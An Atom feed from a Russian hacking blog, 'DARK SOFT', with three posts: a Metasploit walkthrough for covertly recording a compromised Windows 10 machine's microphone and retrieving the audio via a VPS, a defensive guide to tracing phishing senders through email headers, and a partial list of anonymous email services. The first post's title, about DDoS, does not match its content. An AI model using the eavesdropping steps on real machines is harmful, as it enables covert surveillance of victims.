<?xml version="1.0" encoding="utf-8" ?><feed xmlns="http://www.w3.org/2005/Atom" xmlns:tt="http://teletype.in/" xmlns:opensearch="http://a9.com/-/spec/opensearch/1.1/"><title>DARK SOFT</title><author><name>DARK SOFT</name></author><id>https://teletype.in/atom/darksoft</id><link rel="self" type="application/atom+xml" href="https://teletype.in/atom/darksoft?offset=0"></link><link rel="alternate" type="text/html" href="https://teletype.in/@darksoft?utm_source=teletype&amp;utm_medium=feed_atom&amp;utm_campaign=darksoft"></link><link rel="next" type="application/rss+xml" href="https://teletype.in/atom/darksoft?offset=10"></link><link rel="search" type="application/opensearchdescription+xml" title="Teletype" href="https://teletype.in/opensearch.xml"></link><updated>2026-06-27T15:57:20.005Z</updated><entry><id>darksoft:iCQAKMP-D</id><link rel="alternate" type="text/html" href="https://teletype.in/@darksoft/iCQAKMP-D?utm_source=teletype&amp;utm_medium=feed_atom&amp;utm_campaign=darksoft"></link><title>Инструменты и техники DDoS-атак</title><published>2020-07-26T11:47:14.979Z</published><updated>2020-07-26T11:47:14.979Z</updated><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://teletype.in/files/23/c0/23c0ab7a-b05f-421b-b245-fe990a222503.png"></media:thumbnail><summary type="html">&lt;img src=&quot;https://teletype.in/files/6c/99/6c99e690-c307-4971-b33c-402fca160d53.png&quot;&gt;Микрофоны, встроенные в ноутбуки, могут использоваться процессами и службами, запущенными на компьютере под управлением Windows без какого-либо уважения к вопросам безопасности. Это позволяет хакерам легко злоупотреблять доверием пользователей к Windows и к сторонним приложениям, делая аудиозаписи с помощью микрофона скомпрометированного компьютера. После того как хакер создаст полезную нагрузку и установит бэкдор на уязвимом компьютере с Windows 10, он может использовать meterpreter из фреймворка Metasploit для выполнения различных атак, таких как создание скриншотов и перехват нажатий клавиш, кража паролей и извлечение удаленных файлов. Сегодня мы расскажем, как хакер может использовать микрофон своей жертвы для подслушивания.</summary><content type="html">
  &lt;figure class=&quot;m_retina&quot;&gt;
    &lt;img src=&quot;https://teletype.in/files/6c/99/6c99e690-c307-4971-b33c-402fca160d53.png&quot; width=&quot;960&quot; /&gt;
  &lt;/figure&gt;
  &lt;p&gt;Микрофоны, встроенные в ноутбуки, могут использоваться процессами и службами, запущенными на компьютере под управлением Windows без какого-либо уважения к вопросам безопасности. Это позволяет хакерам легко злоупотреблять доверием пользователей к Windows и к сторонним приложениям, делая аудиозаписи с помощью микрофона скомпрометированного компьютера. После того как хакер создаст полезную нагрузку и установит бэкдор на уязвимом компьютере с Windows 10, он может использовать meterpreter из фреймворка Metasploit для выполнения различных атак, таких как создание скриншотов и перехват нажатий клавиш, кража паролей и извлечение удаленных файлов. Сегодня мы расскажем, как хакер может использовать микрофон своей жертвы для подслушивания.&lt;/p&gt;
  &lt;p&gt;&lt;strong&gt;Шаг 1. Незаметная запись звука&lt;/strong&gt;&lt;/p&gt;
  &lt;p&gt;В Metasploit есть специальный модуль record_mic, который можно использовать для создания аудиозаписей с взломанного компьютера. Чтобы начать использовать модуль record_mic, введите следующую команду:&lt;/p&gt;
  &lt;p&gt;use post/multi/manage/record_mic&lt;/p&gt;
  &lt;figure class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;https://telegra.ph/file/30dd9f98f3f0cf22259b6.jpg&quot; width=&quot;640&quot; /&gt;
  &lt;/figure&gt;
  &lt;p&gt;Доступные параметры модуля можно просмотреть с помощью команды options.&lt;/p&gt;
  &lt;figure class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;https://helpugroup.ru/wp-content/uploads/2018/04/hacking-windows-10-remotely-record-listen-microphone-hacked-computer.w1456-1.jpg&quot; width=&quot;893&quot; /&gt;
  &lt;/figure&gt;
  &lt;p&gt;Параметр DURATION определяет длину аудиозаписи, записываемую через микрофон цели. Команду set нужно будет использовать, чтобы установить продолжительность записи звука в секундах.&lt;/p&gt;
  &lt;p&gt;set DURATION 30&lt;/p&gt;
  &lt;p&gt;Следующий параметр — идентификатор сессии (SESSION) нужно будет указать в параметрах модуля. Команда sessions поможет просмотреть все доступные скомпрометированные устройства.&lt;/p&gt;
  &lt;p&gt;sessions&lt;/p&gt;
  &lt;p&gt;Установите идентификатор SESSION, используя следующую команду:&lt;/p&gt;
  &lt;p&gt;set SESSION 1&lt;/p&gt;
  &lt;figure class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;https://telegra.ph/file/5df016b8dfbe1ec4f5faa.jpg&quot; width=&quot;978&quot; /&gt;
  &lt;/figure&gt;
  &lt;p&gt;После того, как вы выставили эти параметры, можете начать запись звука на целевом компьютере с помощью команды run.&lt;/p&gt;
  &lt;figure class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;https://helpugroup.ru/wp-content/uploads/2018/04/hacking-windows-10-remotely-record-listen-microphone-hacked-computer.w1456-3.jpg&quot; width=&quot;847&quot; /&gt;
  &lt;/figure&gt;
  &lt;p&gt;Консоль msf будет сообщать вам о ходе процесса записи. По завершении записи созданный аудиофайл в формате WAV будет автоматически сохранен в директории /root/.msf4/loot/.&lt;/p&gt;
  &lt;p&gt;&lt;strong&gt;Шаг 2. Как найти записанные аудиофайлы&lt;/strong&gt;&lt;/p&gt;
  &lt;p&gt;Чтобы получить доступ к только что созданной аудиозаписи, которая сохранена на VPS, находясь в консоли msf, перейдите с помощью команды cd в каталог /loot/.msf4/loot/.&lt;/p&gt;
  &lt;p&gt;cd /root/.msf4/loot/&lt;/p&gt;
  &lt;p&gt;Затем используйте Python3 для того, чтобы запустить простой HTTP-сервер на 8080-м порту, используя следующую команду. Аргумент -m вызывает модуль «http.server» Python3, а 8080 — это номер порта, на котором будет запущен веб-сервер:&lt;/p&gt;
  &lt;p&gt;python3 -m http.server 8080&lt;/p&gt;
  &lt;figure class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;https://telegra.ph/file/b8266c81a2868e69d2210.jpg&quot; width=&quot;765&quot; /&gt;
  &lt;/figure&gt;
  &lt;p&gt;Несмотря на то, что сервер Python3 будет работать как временный веб-сервер, терминал msf уже не будет использоваться. Тем не менее в этом случае у вас появляется возможность просматривать список созданных аудиофайлов с помощью любого веб-браузера и из любой точки мира — просто введите IP-адрес VPS-сервера в адресную строку браузера и добавьте номер порта (8080) через двоеточие:&lt;/p&gt;
  &lt;p&gt;http://IP_адрес_вашего_VPS:8080/&lt;/p&gt;
  &lt;figure class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;https://helpugroup.ru/wp-content/uploads/2018/04/hacking-windows-10-remotely-record-listen-microphone-hacked-computer.w1456-5.jpg&quot; width=&quot;813&quot; /&gt;
  &lt;/figure&gt;
  &lt;p&gt;Чтобы остановить веб-сервер Python3 и выйти в консоль нажмите Ctrl+C.&lt;/p&gt;
  &lt;p&gt;&lt;strong&gt;Шаг 3. Воспроизведение записанных аудиофайлов&lt;/strong&gt;&lt;/p&gt;
  &lt;p&gt;Большинство веб-браузеров по умолчанию не воспроизводят WAV-аудиофайлы, поэтому файлы придется сохранить куда-нибудь на ваш жесткий диск и прослушивать с помощью аудиоплеера. Audacity — популярный аудиоплеер, доступный в репозиториях Kali, его можно установить с помощью следующей команды:&lt;/p&gt;
  &lt;p&gt;sudo apt-get install audacity&lt;/p&gt;
  &lt;figure class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;https://telegra.ph/file/b0553f81051548ab63e4a.jpg&quot; width=&quot;842&quot; /&gt;
  &lt;/figure&gt;
  &lt;p&gt;После того, как Audacity будет установлен, кликните правой кнопкой мыши по скаченному WAV-файлу и откройте его с помощью Audacity, что позволит прослушать записанный звук.&lt;/p&gt;
  &lt;figure class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;https://telegra.ph/file/4c0e56e428489d17a937b.jpg&quot; width=&quot;938&quot; /&gt;
  &lt;/figure&gt;
  &lt;p&gt;&lt;strong&gt;Заключение&lt;/strong&gt;&lt;/p&gt;
  &lt;p&gt;Если на вашем компьютере с Windows установлен бэкдор, как мы это делали, то вы видите насколько легко хакерам прослушивать все, что вы говорите. Хоть они и не могут слышать это в режиме реального времени, но они могут прослушать сделанные записи, когда захотят и где захотят. Чтобы этого не произошло:&lt;/p&gt;
  &lt;ul&gt;
    &lt;li&gt;Используйте AppArmor. Система безопасности, спроектированная для таких операционных систем Linux, как Ubuntu, может запретить некоторым приложениям доступ к определенным частям компьютера. Например, открытие вредоносного PDF-файла, когда приложение для просмотра PDF не имеет доступа к микрофону, предотвратит такую атаку.&lt;/li&gt;
    &lt;li&gt;Используйт Qubes. Qubes обеспечивает безопасность путем разделения. Это позволяет пользователям разделить различные части своих действий на компьютере на безопасно изолированные отсеки. Qubes, возможно, самая безопасная операционная система для десктопов. Пользователям Windows сначала может быть будет трудно ее использовать, но если безопасность ОС — в приоритете, то Qubes будет очень подходящим решением.&lt;/li&gt;
    &lt;li&gt;Физически удалите микрофон. Если микрофон не является абсолютно необходимым для работы, а безопасность важна, то это наиболее предпочтительный вариант.&lt;/li&gt;
    &lt;li&gt;Защитите свой компьютер от бэкдоров. Хотя все вышеперечисленное полезно, когда у вас уже установлен в системе бэкдор, но лучше всего как раз убедиться, что уязвимости вашей системы вообще не эксплуатируют.&lt;/li&gt;
  &lt;/ul&gt;

</content></entry><entry><id>darksoft:asFE4jm-4</id><link rel="alternate" type="text/html" href="https://teletype.in/@darksoft/asFE4jm-4?utm_source=teletype&amp;utm_medium=feed_atom&amp;utm_campaign=darksoft"></link><title>Как определить IP адрес по E-mail?</title><published>2020-07-24T15:42:47.548Z</published><updated>2020-07-24T15:42:47.548Z</updated><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://teletype.in/files/97/73/97736a98-189f-4e22-bf31-91222f50c3fc.png"></media:thumbnail><summary type="html">&lt;img src=&quot;https://teletype.in/files/e5/72/e5720aa6-b0e5-490a-b3ec-6ac88c834c2f.png&quot;&gt;Вам могут прислать письмо, например, от «Яндекс.Деньги» (или «Киви-Кошелек», «Сбербанк-онлайн» и пр.). Перейдя по ссылке из такого сообщения, вы попадете на поддельный сайт (максимально повторяющий оригинал) и там добровольно отдадите все свои персональные данные (включая пароль). А дальше с ними можно делать все что угодно: переводить и обналичивать деньги, делать покупки онлайн и даже оформлять на ваше имя кредиты в микрофинансовых организациях.</summary><content type="html">
  &lt;figure class=&quot;m_retina&quot;&gt;
    &lt;img src=&quot;https://teletype.in/files/e5/72/e5720aa6-b0e5-490a-b3ec-6ac88c834c2f.png&quot; /&gt;
  &lt;/figure&gt;
  &lt;p&gt;Вам могут прислать письмо, например, от «Яндекс.Деньги» (или «Киви-Кошелек», «Сбербанк-онлайн» и пр.). Перейдя по ссылке из такого сообщения, вы попадете на поддельный сайт (максимально повторяющий оригинал) и там добровольно отдадите все свои персональные данные (включая пароль). А дальше с ними можно делать все что угодно: переводить и обналичивать деньги, делать покупки онлайн и даже оформлять на ваше имя кредиты в микрофинансовых организациях.&lt;/p&gt;
  &lt;p&gt;Для того, чтобы не попасться на удочку таких мошенников, необходимо уметь отличать подобные рассылки от настоящих. Как это делать – разберем в нашей статье.&lt;/p&gt;
  &lt;h3&gt;Анатомия электронного письма&lt;/h3&gt;
  &lt;p&gt;Отправляя и получая электронные письма, рядовой пользователь редко задумывается о том, что с этими письмами происходит по пути следования. Доставка осуществляется за считанные секунды, независимо от места нахождения адресата. Мы получаем сообщения, фотографии, видео, полезные ссылки и массу другой информации. Мама высылает рецепты дочери, коллеги друг другу – отчеты и рабочие материалы, банки и кредитные организации – информацию о задолженности, операциях по счету и пр.&lt;/p&gt;
  &lt;p&gt;Нам кажется, что общение происходит напрямую: из рук в руки. Однако это не совсем так. В процессе отправки и получения, помимо компьютеров отправителя и получателя, принимают участие еще как минимум два почтовых сервера.&lt;/p&gt;
  &lt;p&gt;Схематично процесс отправки электронного письма выглядит так:&lt;/p&gt;
  &lt;figure class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;https://2ip.ru/uploads/articles/email_path.png&quot; width=&quot;594&quot; /&gt;
    &lt;figcaption&gt;Маршрутизация прохождения E-mail&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;p&gt;Каждый из них работает по определенным правилам, которые регулируются специальными протоколами: SMTP (Simple Mail Transfer Protocol) – передача почты, POP3 (Post Office Protocol, версия 3) – прием почты или IMAP – доступ к почтовым ящикам, находящимся на почтовом сервере.&lt;/p&gt;
  &lt;p&gt;Буквально за секунды, которые занимает пересылка вашего письма, почтовые сервисы дополняют его массой информации. Например, мною через Mail.ru было получено вот такое лаконичное письмо (всего на 4 строчки текста) якобы от международной торговой компании Амазон. Почтовый сервер услужливо определил его как спам и отправил в соответствующую папку. Как он пришел к такому решению?&lt;/p&gt;
  &lt;figure class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;https://2ip.ru/uploads/articles/email-1.jpg&quot; width=&quot;979&quot; /&gt;
  &lt;/figure&gt;
  &lt;p&gt;Для того чтобы увидеть информацию, добавляемую почтовыми серверами, необходимо нажать на кнопку «Еще» верхней командной строки:&lt;/p&gt;
  &lt;figure class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;https://2ip.ru/uploads/articles/email-2.jpg&quot; width=&quot;979&quot; /&gt;
  &lt;/figure&gt;
  &lt;p&gt;После этого нажать на нижнюю строчку выпадающего списка под названием «Служебные заголовки»:&lt;/p&gt;
  &lt;figure class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;https://2ip.ru/uploads/articles/email-3.jpg&quot; width=&quot;974&quot; /&gt;
  &lt;/figure&gt;
  &lt;p&gt;В отдельном окне откроется та самая служебная информация, которую добавляют к любому электронному письму почтовые серверы:&lt;/p&gt;
  &lt;figure class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;https://2ip.ru/uploads/articles/email-4.jpg&quot; width=&quot;785&quot; /&gt;
  &lt;/figure&gt;
  &lt;p&gt;Впечатляет? И это все к сообщению на 4 строки! Помимо адреса отправителя и получателя, здесь перечислены даты и время отправки, IP-адрес отправителя, индивидуальный номер сообщения и масса других служебных сведений.&lt;/p&gt;
  &lt;p&gt;Если вы используете другие почтовые сервисы, то там тоже есть возможность получить необходимую информацию. Например, в другом популярном почтовом сервисе – Gmail – необходимо нажать на три точки в верхнем правом углу (заголовок электронного письма) и далее выбрать строку «Показать оригинал»:&lt;/p&gt;
  &lt;figure class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;https://2ip.ru/uploads/articles/email-6.jpg&quot; width=&quot;959&quot; /&gt;
  &lt;/figure&gt;
  &lt;p&gt;В новом окне можно будет увидеть идентификатор сообщения, от кого и кому направлено письмо.&lt;/p&gt;
  &lt;p&gt;Чем же нам может быть полезна эта информация? Наиболее ценными из всего этого являются сведения об IP-адресе.&lt;/p&gt;
  &lt;h3&gt;Как найти IP адрес через служебный заголовок письма.&lt;/h3&gt;
  &lt;p&gt;Если вы никогда не сталкивались с понятием IP-адрес – прочитать о нем подробнее можно &lt;a href=&quot;https://2ip.ru/article/ip/&quot; target=&quot;_blank&quot;&gt;здесь&lt;/a&gt;, &lt;a href=&quot;https://2ip.ru/article/dynvsstatic/&quot; target=&quot;_blank&quot;&gt;здесь&lt;/a&gt; или &lt;a href=&quot;https://2ip.ru/article/findaddress/&quot; target=&quot;_blank&quot;&gt;здесь&lt;/a&gt;. Зная его, можно получить много ценных сведений об отправителе электронного сообщения. Находим значение IP в тексте служебного заголовка письма:&lt;/p&gt;
  &lt;figure class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;https://2ip.ru/uploads/articles/email-8.jpg&quot; width=&quot;643&quot; /&gt;
  &lt;/figure&gt;
  &lt;p&gt;Поскольку письма могут перенаправляться через несколько серверов, то при наличии нескольких IP в разделе «Служебный заголовок» нужно смотреть тот, который, как правило (но не всегда), расположен ниже других. Необходимое нам цифровое значение должно находится в разделе «Received», тогда как в разделе «From» (нижняя строчка) указан якобы адрес Амазона (именно содержимое данного поля мошенники и подделывают, чтобы выдать себя за кого-то другого).&lt;/p&gt;
  &lt;p&gt;Если нет желания копаться в служебных заголовках, то еще проще определить IP отправителя через наш сервис: &lt;a href=&quot;https://2ip.ru/know-email-ip/&quot; target=&quot;_blank&quot;&gt;Определение IP адреса по Е-mail&lt;/a&gt;.&lt;/p&gt;
  &lt;p&gt;Порядок действий при этом следующий:&lt;/p&gt;
  &lt;ol&gt;
    &lt;li&gt;Открываете сомнительное письмо, адрес которого нужно проверить.&lt;/li&gt;
    &lt;li&gt;Пересылаете его на специальный адрес: knowemailip@gmail.com.&lt;/li&gt;
    &lt;li&gt;Через несколько секунд вносите электронный адрес подозрительного отправителя в окно нашего сервиса.&lt;/li&gt;
    &lt;li&gt;Нажимаете кнопку «Проверить»:&lt;/li&gt;
  &lt;/ol&gt;
  &lt;figure class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;https://2ip.ru/uploads/articles/email-9.jpg&quot; width=&quot;676&quot; /&gt;
  &lt;/figure&gt;
  &lt;p&gt;Воспользоваться данным сервисом можно через почтовые клиенты, например – через The Bat.&lt;/p&gt;
  &lt;p&gt;Информация на сервере хранится не более часа, поэтому все действия лучше выполнять в течение этого времени (и отправку письма, и проверку через «Определение IP-адреса по E-mail».&lt;/p&gt;
  &lt;h3&gt;Что делать дальше с полученным IP адресом?&lt;/h3&gt;
  &lt;p&gt;Полученный IP адрес не поможет определить абсолютно точный почтовый адрес отправителя, но укажет регион расположения сервера, организацию, на которую проводилась регистрация, и данные о провайдере.&lt;/p&gt;
  &lt;p&gt;Для определения местонахождения можно воспользоваться несколькими сервисами. Например, через этот: &lt;a href=&quot;https://2ip.ru/geoip/&quot; target=&quot;_blank&quot;&gt;&amp;quot;Определить месторасположение&amp;quot;&lt;/a&gt;. По умолчанию он определяет ваше местонахождение.&lt;/p&gt;
  &lt;p&gt;Вводим в окно поиска IP адрес, который нашли в служебном заголовке или получили через наш сервис «Определение IP-адреса по E-mail» и нажимаем кнопку «Проверить»:&lt;/p&gt;
  &lt;figure class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;https://2ip.ru/uploads/articles/email-10.jpg&quot; width=&quot;610&quot; /&gt;
  &lt;/figure&gt;
  &lt;p&gt;Данные о местонахождении выводятся в виде интерактивной карты с краткой сопроводительной информацией о стране, городе, организации и провайдере интересующего нас IP.&lt;/p&gt;
  &lt;figure class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;https://2ip.ru/uploads/articles/email-11.jpg&quot; width=&quot;630&quot; /&gt;
  &lt;/figure&gt;
  &lt;p&gt;Таким образом выясняется, что «электронный перевод» мне «пытаются» сделать из Швеции, тогда как покупки в Амазоне я делаю исключительно через Великобританию. Такое, конечно, бывает: офисы международных компаний могут находиться в разных странах. Но может и насторожить. Особенно, если точно известно, где находятся представительства фирм, от лица которых вы получаете рассылки. Аналогичную проверку можно провести и при получении странных писем через контакты на сайтах знакомств: пишут якобы из США или Италии, а IP- адрес определяется в Ереване или ближайшем Подмосковье.&lt;/p&gt;
  &lt;p&gt;О проблемах с данным письмом мне сообщает и почтовый сервер Mail.ru, который не считает этот адрес «одобренным отправителем» и автоматически помещает сообщения от него в папку «Спам». Mail.ru (так же как и другие «почтовики») проводит автоматическое сравнение параметров из полей ««Received» и «From» служебного заголовка и, если они не совпадают – относит такие послания к сомнительным. При переходе по ссылке из такого письма я вместо перевода рискую получить только массу неприятностей.&lt;/p&gt;
  &lt;p&gt;Аналогичным образом работает и сервис по определению местонахождения по IP адресу под названием &lt;a href=&quot;https://2ip.ru/whois/&quot; target=&quot;_blank&quot;&gt;Информация об IP адресе или домене&lt;/a&gt;.&lt;/p&gt;
  &lt;p&gt;Для получения сведений нужно ввести цифровое значение IP и нажать на кнопку «Проверить»:&lt;/p&gt;
  &lt;figure class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;https://2ip.ru/uploads/articles/email-12.jpg&quot; width=&quot;687&quot; /&gt;
  &lt;/figure&gt;
  &lt;p&gt;В итоговой выдаче можно увидеть не только регион расположения провайдера и его название, но и контактные данные. При желании можно подать жалобу на спам-рассылку по указанному телефону или почтовому адресу:&lt;/p&gt;
  &lt;figure class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;https://2ip.ru/uploads/articles/email-13.jpg&quot; width=&quot;553&quot; /&gt;
  &lt;/figure&gt;
  &lt;h3&gt;Подделка заголовков писем&lt;/h3&gt;
  &lt;p&gt;Как мы видим из разобранного примера, для мошенников не составляет особого труда частично подделать заголовок письма. Довольно часто это практикуется для того, чтобы выдать себя за представителя известной компании или сервиса.&lt;/p&gt;
  &lt;p&gt;Например, можно выслать вредоносную программу с адреса Яндекса под видом письма от сотрудника службы поддержки:&lt;/p&gt;
  &lt;figure class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;https://2ip.ru/uploads/articles/email-14.jpg&quot; width=&quot;974&quot; /&gt;
  &lt;/figure&gt;
  &lt;p&gt;После открытия раздела «Служебный заголовок» можно выяснить, что реальный адрес отправителя совершенно другой, а письмо пересылалось с использованием других адресов и сервисов.&lt;/p&gt;
  &lt;figure class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;https://2ip.ru/uploads/articles/email-15.jpg&quot; width=&quot;1160&quot; /&gt;
  &lt;/figure&gt;
  &lt;p&gt;При этом IP-адрес отправителя находится в Иркутске:&lt;/p&gt;
  &lt;figure class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;https://2ip.ru/uploads/articles/email-16.jpg&quot; width=&quot;626&quot; /&gt;
  &lt;/figure&gt;
  &lt;p&gt;Использующие подобные схемы мошенничества часто подстраиваются под рассылки сервисов онлайн платежей, почтовых служб, банков и кредитных организаций, социальных сетей, популярных служб знакомств и пр.&lt;/p&gt;
  &lt;p&gt;Будьте бдительны при получении сомнительных писем и научите этому своих пожилых родителей и детей, которые еще не освоили в полной мере тонкости общения в сети. Научите их распознавать основные признаки мошенничества и ни в коем случае не выполнять действий, о которых просят в письме.&lt;/p&gt;
  &lt;p&gt;Проверяйте, проверяйте и еще раз проверяйте! Тем более, что определить истинный адрес отправителя и сведения о его месторасположении достаточно легко.&lt;/p&gt;

</content></entry><entry><id>darksoft:xicSFnZ1J</id><link rel="alternate" type="text/html" href="https://teletype.in/@darksoft/xicSFnZ1J?utm_source=teletype&amp;utm_medium=feed_atom&amp;utm_campaign=darksoft"></link><title>Лучшие анонимные почтовые сервисы</title><published>2020-07-23T08:55:32.430Z</published><updated>2020-07-23T08:55:32.430Z</updated><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://teletype.in/files/e6/61/e6617f80-6db8-4ae3-8861-8c6f31361cfc.png"></media:thumbnail><summary type="html">&lt;img src=&quot;https://teletype.in/files/71/17/71179e87-9612-4d4d-b315-b3a3b8a32b97.png&quot;&gt;URL-адрес Clearnet: https://protonmail.com/</summary><content type="html">
  &lt;figure class=&quot;m_retina&quot;&gt;
    &lt;img src=&quot;https://teletype.in/files/71/17/71179e87-9612-4d4d-b315-b3a3b8a32b97.png&quot; width=&quot;960&quot; /&gt;
  &lt;/figure&gt;
  &lt;h3&gt;1. Proton Mail&lt;/h3&gt;
  &lt;p&gt;&lt;a href=&quot;https://protonmail.com/&quot; target=&quot;_blank&quot;&gt;URL-адрес Clearnet: https://protonmail.com/&lt;/a&gt;&lt;/p&gt;
  &lt;p&gt;&lt;a href=&quot;https://protonirockerxow.onion/login&quot; target=&quot;_blank&quot;&gt;Лук URL: https://protonirockerxow.onion/login&lt;/a&gt;&lt;/p&gt;
  &lt;p&gt;Протонная Почта, вероятно, является одним из наиболее профессионально поддерживаемых анонимных почтовых сервисов.&lt;/p&gt;
  &lt;p&gt;Это я утверждаю, основываясь на том факте, что большинство других анонимных почтовых сервисов не имеют профессионально поддерживаемого URL-адреса clearnet, или даже если они это делают, страницы довольно просты без большой информации об их услугах.&lt;/p&gt;
  &lt;p&gt;В то время как с Proton Mail, их clearnet URL объясняет все, что вам нужно знать об их анонимных почтовых службах.&lt;/p&gt;
  &lt;p&gt;Заметные Особенности ProtonMail:&lt;/p&gt;
  &lt;p&gt;Открытый исходный код: когда я собираюсь доверить какой-то компании свою анонимность и конфиденциальность, это всегда помогает, если они с открытым исходным кодом. Это помогает нам проанализировать код для себя и увидеть, действительно ли они предоставляют то, что обещают. Кроме того, будучи открытым исходным кодом, он гарантирует, что они ничего не скрывают, поэтому, даже если вы не очень “кодер”, это все равно повышает уверенность.&lt;/p&gt;
  &lt;p&gt;Автоматическое Одноранговое шифрование: письма шифруются автоматически от отправителя к получателю,и шифрование даже не предоставляет доступ к команде ProtonMail. Так что да, это безопасно.&lt;/p&gt;
  &lt;p&gt;Никакие личные данные не требуются: даже для регистрации на платформе не требуется никакой личной информации, такой как имена, дата рождения или любые другие подобные данные.&lt;/p&gt;
  &lt;p&gt;Политика отсутствия журналов: веб-сайт сам по себе не хранит никаких IP-журналов.&lt;/p&gt;
  &lt;p&gt;Швейцарские серверы: Швейцария обычно популярна своими &amp;quot;банками&amp;quot;, но она также сохраняет тот же уровень анонимности и конфиденциальности для своих серверов, и именно там размещаются серверы Proton Mail.&lt;/p&gt;
  &lt;p&gt;Простой в использовании интерфейс: пользовательский интерфейс, в отличие от большинства других анонимных почтовых сервисов, не является “базовым”, но он точно отражает Gmail. Так что да, это еще одна причина, чтобы пойти с ProtonMail, а также.&lt;/p&gt;
  &lt;p&gt;Proton Mail позиционирует себя как “анти-АНБ”, хотя это спорно, но это, безусловно, один из ближайших анонимных почтовых сервисов анти-АНБ, с которыми вы пересекаетесь.&lt;/p&gt;
  &lt;p&gt;Более того, у них даже есть iOS, Android и Web (clearnet).&lt;/p&gt;
  &lt;h3&gt;2. ParanoidPi&lt;/h3&gt;
  &lt;p&gt;&lt;a href=&quot;https://paranoid.email/&quot; target=&quot;_blank&quot;&gt;URL-адрес Clearnet: https://paranoid.email/&lt;/a&gt;&lt;/p&gt;
  &lt;p&gt;&lt;a href=&quot;https://paranoid2ezdphvm.onion/&quot; target=&quot;_blank&quot;&gt;Лук URL: https://paranoid2ezdphvm.onion/&lt;/a&gt;&lt;/p&gt;
  &lt;p&gt;Это анонимный почтовый сервис, разработанный ParanoidPi. Как следует из названия, они “параноики” и, как говорится, “выживают только параноики”. Так что да, без сомнения, они преданы делу.&lt;/p&gt;
  &lt;p&gt;Некоторые заметные особенности PraranoidPi:&lt;/p&gt;
  &lt;p&gt;100% Nat (Network Address Translation) Cloak: это означает, что каждый бит электронной почты скрыт и выполняется за NAT. Начиная прямо с шифрования, расшифровки и заканчивая закрытыми ключами, ничто не остается на волю случая.&lt;/p&gt;
  &lt;p&gt;Гарантированное шифрование: бывают случаи, когда почта не шифруется с конца отправителя. В этом случае ParanoidPi шифрует электронные письма с их конца, используя наши (пользователей) лобковые ключи.&lt;/p&gt;
  &lt;p&gt;OpenPGP Encrypted: если вы находитесь в глубокой / темной паутине уже довольно долгое время и отважились на глубокие веб-рынки, в этом случае вы, возможно, уже знаете, что такое шифрование PGP. Это в основном Одноранговое шифрование, которое позволяет людям шифровать и расшифровывать сообщения с помощью закрытых ключей, и только владельцам ключей предоставляется доступ к сообщению.&lt;/p&gt;
  &lt;p&gt;Автоматический отказ: их 2048 и 4096 битное шифрование гарантирует, что ваши почтовые ящики получают только зашифрованные письма, если нет, они отскакивают и, следовательно, не достигают вашего почтового ящика, предотвращая любую угрозу или перехват, который мог бы произойти.&lt;/p&gt;
  &lt;p&gt;Paranoid Infrastructure Routing: в случае, если вы находитесь на своем собственном домашнем IP-адресе, даже тогда нет никакого риска для безопасности вашей электронной почты, потому что все маршрутизируется через Paranoid Infrastructure. Это также решает дополнительные проблемы &amp;quot;спам-фильтров&amp;quot;, а также DynIPs.&lt;/p&gt;
  &lt;p&gt;И это еще не все, они скоро запустят “VPN-туннели” для получения электронной почты SMTP.&lt;/p&gt;
  &lt;h3&gt;3. Daniel Winzen’s Platform&lt;/h3&gt;
  &lt;p&gt;&lt;a href=&quot;https://danwin1210.me/mail/&quot; target=&quot;_blank&quot;&gt;URL-адрес Clearnet: https://danwin1210.me/mail/&lt;/a&gt;&lt;/p&gt;
  &lt;p&gt;Это совершенно частный сервер электронной почты и XMPP, разработанный Даниэлем Винценом, и он бесплатно делится им со всем миром.&lt;/p&gt;
  &lt;p&gt;Наряду с бесплатными анонимными почтовыми сервисами, он также может похвастаться услугами чата, сокращениями URL и парой других личных проектов.&lt;/p&gt;
  &lt;p&gt;В почтовом сервисе Даниэля не так много технических деталей, кроме того, что он зашифрован, безопасен и прост в интерфейсе.&lt;/p&gt;
  &lt;p&gt;Наряду с идентификатором электронной почты, он также предоставляет пользователям XMPP, а также учетную запись jabber, веб-почта по умолчанию на платформе Даниэля имеет 25 МБ пространства.&lt;/p&gt;
  &lt;p&gt;Так что пока он используется с жесткой рукой, и только для чрезвычайно срочных и безопасных разговоров, этого должно быть достаточно. Но пространство также можно расширить, просто отправив письмо Даниэлю.&lt;/p&gt;
  &lt;h4&gt;4.AnonMail Onion Mail Server&lt;/h4&gt;
  &lt;p&gt;&lt;a href=&quot;https://onionmail.info/&quot; target=&quot;_blank&quot;&gt;URL-адрес Clearnet: https://onionmail.info/&lt;/a&gt;&lt;/p&gt;
  &lt;p&gt;&lt;a href=&quot;http://wc2eyfmw7wrwomf4.onion/&quot; target=&quot;_blank&quot;&gt;Лук URL: http://wc2eyfmw7wrwomf4.onion&lt;/a&gt;&lt;/p&gt;
  &lt;p&gt;У Почты Onion есть несколько серверов, из которых вы можете выбрать, приведенный выше сетевой URL-адрес Onion-это только один из них.&lt;/p&gt;
  &lt;p&gt;Большинство других серверов имеют те же функциональные возможности и функции, так что картина для этого одного URL-адреса также означает, что вы можете использовать другие серверы из списка взаимозаменяемо.&lt;/p&gt;
  &lt;p&gt;Основные функции или почтовая служба AnonMail Onion:&lt;/p&gt;
